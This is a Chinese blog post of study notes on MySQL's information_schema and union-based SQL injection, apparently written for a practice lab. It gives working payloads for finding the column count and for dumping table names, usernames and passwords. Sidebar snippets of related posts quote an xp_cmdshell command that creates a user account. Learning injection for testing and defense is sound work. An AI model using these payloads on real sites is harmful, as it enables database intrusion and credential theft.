SQL注入与MySQL查询语句

最新推荐文章于 2022-05-04 22:38:33 发布
最新推荐文章于 2022-05-04 22:38:33 发布
阅读量428 收藏
点赞数
分类专栏: 笔记 文章标签: 渗透测试 安全漏洞 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46145025/article/details/118404261
版权

一,mysql简介

数据库A =====网站A
      表名
            列名
                  数据
数据库B =====网站B

继mysql5.0后,默认在数据库存放一个“information_schema”的数据库,其中包含三个表(SCHEMATA,TABLES,COLUMNS)

SCHEMNSz表存储该用户创建的所有数据库的库名,该表中记录数据库库名的字段名为SCHEMA_NAME

TABLES表存储该用户创建的所有数据库的库名和表名,该表中记录数据库库名和表名的字段名分别为TABLE_SCHEMA和TABLE_NAME。

COLUMNS表名和字段名的字段名为TABLE_SCHEMA,TABLE_NAME和COLUMN_NAME。

二、mysql查询语句

1.#无条件查询
SELECT 要查询的字段名 FROM 库名.表名
2.#已知一条条件查询
SELECT 要查询的字段名 FROM 库名.表名 WHERE 已知条件的字段名=‘已知条件的值’
3.#已知两条条件查询
SELECT 要查询的字段名 FROM 库名.表名 WHERE 已知道条件1的字段名=‘已知条件1的值’ AND 已知条件2的字段名=‘已知条件2的值’
4.基本函数
     Database():当前网站使用的数据库
     Version():当前MySQL的版本
     User():当前MySQL的用户
5.注释符号:
       #或-- 空格或/**/
       内联注释:index.php?id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3
6.判断字符串引号(‘)的使用
      /?id=1'and 1=1 --+
     正常输出
     出错代表没有闭合 说明没有用’可能没有用’ 或用了”或()
      /?id=1%27and%201=2--+
      否则是”字符串注入
7.判断所在数据的列数
     /?id=1'order by 3 --+ 
     判断是否有3列
8.判断所显示内容在数据库第几列
    ’union select 1,2,3 --+
      查询所需内容
9.查找当前用户
 ' union select 1,user(),3 --+
  root权限
10.查找当前数据库
  ' union select 1,database(),3 --+
11.查找数据库表名
  'union select 1,(select group_concat(table_name) from information_schema.tables where table_schema ='security'),3 --+
   表名是xx,xxx,xxxx,
   group_concat() 计算哪些行属于同一组,且将属于同一组的列显示出来。
12.查找users里的字段
   ' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = 'security' and table_name = 'users'),3 --+
13.查找用户名
   ' union select 1,(select group_concat(username) from security.users),3 --+
14.查找密码
   ' union select 1,(select group_concat(password) from security.users),3 --+
15.利用union访问数据
   在访问id=1 union select 1,2,3时,执行的SQL语句为:  `Select * from users where ‘id’=1 union select 1,2,3“
   表示可以分为select \* from users where ‘id’=1和union select 1,2,3两条,利用第二条语句(Union查询)就可以获取数据库中的数据。
莫黎小天
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MySQL的简单查询语句
Lsunrise_的博客
02-18 1104
查询: 一:查询所有数据 select * from Info 查所有数据 select Code,Name from Info 查特定列 二:根据条件查 select * from Info where Code='p001' 一个条件查询 select * from Info where Code='p001' and Nation='n001' 多条件 并关系 查询 sel
sql注入语句大全
weixin_34239169的博客
03-31 324
sql注入语句大全 --是否存在xp_cmdshell and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell') --用xp_cmdshell执行命令 ;exec master..xp_cmdshell "net user name passwo...
mysql 基础注入查询语句
Guoke324的博客
08-03 384
mysql 基础查询语句 sql 基础语句 select @@version 查询数据库版本 select version() 查询数据库版本 select @@servername 客户端主机名 select @@servername 服务端主机名 select user() 查询当前用户名 select @@port 查询 mysql 服务端口 select current_user() 查询当前连接用户名 select system_user() 查询数据库用户名 sele
mysql 盲注查询语句_针对小白的一个sql注入教程(联合查询,盲注等等) 持续更新!!!...
weixin_42515989的博客
02-10 285
环境搭建:实验环境可参照:https://www.freebuf.com/articles/web/253234.htmlSQL语句基础:注意在mysql里每句语句结束一定要加分号;1.查询语句:1 select database(); #查询当前使用的数据库2select user(); #查询当前用户3select now(); #查询当前...
SQL注入MYSQL基础语句(持续更新)附图
weixin_44431280的博客
03-19 5573
SQL注入mysql基础语句 简介:常见的Web安全漏洞中,SQL注入利用和危害极大,通过其可以直接获取数据表的内容,从而获得Web站点的账号和密码,在学习SQL注入时,我们需要先对常见的数据库基础进行学习和了解。 MYSQL基础语句 一:数据库操作 1,在当前数据库管理系统中创建/删除数据库:create/drop dadabase websec; 2,查看当前数据库管理系统下所有数据库:show databases; 3,使用(进入)操作的数据库,use websec; 二:数据表操作 1,创建数据
Mysql数据库使用concat函数执行SQL注入查询
09-10
MySQL数据库中的`CONCAT`函数在SQL注入场景中扮演着重要的角色,因为它允许攻击者将多个字段合并成一个字符串,从而获取原本无法直接查询到的信息。SQL注入是一种常见的安全漏洞,发生在应用程序未能充分验证用户...
10-sql注入-mysql注入1
08-03
SQLMap是一个自动化SQL注入工具,可以用来探测、利用和清洗SQL注入漏洞,它能执行读取文件、查询表名等操作。 8. **显错注入**: 利用MySQL的错误信息进行注入,如输入单引号来触发错误,然后结合`UNION SELECT`...
SQL Injection with MySQL 注入分析
09-14
SQL注入是一种常见的网络安全威胁,主要针对使用SQL(结构化查询语言)的数据库系统,如MySQL。此技术允许攻击者通过输入恶意SQL代码来操纵或获取数据库中的敏感信息。本文将深入探讨MySQL数据库的SQL注入问题,以及...
MySQL常用sql语句生成器
最新发布
03-22
- 安全性:一些生成器会检查SQL注入等安全问题,确保生成的语句是安全的。 8. 结论 MySQL SQL语句生成器是数据库管理和开发的有效工具,它使用户能够更轻松地与MySQL数据库交互。了解并熟练掌握SQL语句是每个数据库...
PHP+MysqlSQL注入源码 下载
04-25
【PHP+MySQLSQL注入】 在互联网开发中,PHP与MySQL是常见的组合,用于构建动态网站和应用程序。PHP是一种服务器端脚本语言,主要用于Web开发,可以与多种数据库系统配合,其中MySQL是最常用的一种开源关系型...
MYSQL注入语句
一小平民
08-24 2013
and ord(mid(version(),1,1))>51 解释1: 确认数据库版本 51是ASCII码3 正确则>4.0 错误则解释2:ord()是mysql的函数用于获取二进制码;解释3:mid()是mysql的函数用于截位操作;解释4:version()是mysql的函数用于获取当前数据库的版本; union select 1,1,1,****1,1  解释:联合功能,用于
常用Mysql注入语句
weixin_33716557的博客
11-09 139
Mysql sqlinjection code # %23 -- /* /**/ 注释 UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,5...
通过Mysql语句查询得到mysql安装路径
qq_32217519的博客
07-06 447
第一编辑
Mysql注入 常用查询
Zhuoqian_1的博客
05-09 399
数据库 -> 表 -> 字段 database() 查询当前数据库名 group_concat(table_name) 一次性显示多条表名 查询所有数据库名 select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA 查询某个数据库下的表名 select group_concat(table_name) from information_schema.tables where table_schema=data.
myql里面的sql注入
m0_46392035的博客
05-04 278
概念 SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 大白话就是,黑客攻击数据库,非法获取数据。 SQL 是操作数据库数据的结构化查询语言,网页的应用数据和后台数据库中的数据进行交互时会采用 SQL。而 SQL 注入是将 Web 页面的原 URL、表单域或数据包输入的参数,修改拼接成 S
获得Mysql安装路径
u014170719的博客
06-23 421
show variables where variable_name = 'basedir'; 使用上面语句可以查询Mysql的安装路径(如下图)。 参考: Server System Variables SHOW VARIABLES Syntax
sql注入:如何从查询中输出你想要的任意值
qq_25987491的博客
04-18 1488
SELECT username FROM admin where id =-1 union select concat('bcbe3365e6ac95ea2c0343a2395834dd') 原理:当没有id为-1的用户时 就会显示union后的语句 也就是 bcbe3365e6ac95ea2c0343a2395834dd ...
SQL注入的总结
ad12456的博客
03-27 1946
SQL注入
SQL注入之联合查询注入
热门推荐
selecthch的博客
06-07 4万+
联合查询注入利用的前提前提条件:页面上有显示位什么是显示位?在一个在一个网站的正常页面,服务端执行SQL语句查询数据库中的数据,客户端将数 据展示在页面中,这个展示数据的位置就叫显示位联合注入的过程1、判断注入点2、判断是整型还是字符型3、判断查询列数4、判断显示位5、获取所有数据库名6、获取数据库(test)所有表名7、获取(数据库:test,表:admin)中所有字段名8、获取字段中的数据一、...
mysql 查询语句动态sql
08-08
这样可以避免SQL注入攻击,并提高执行效率。 下面是一个示例,演示如何在MySQL中使用动态SQL查询语句: ```python import mysql.connector # 创建数据库连接 conn = mysql.connector.connect( host="localhost",...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值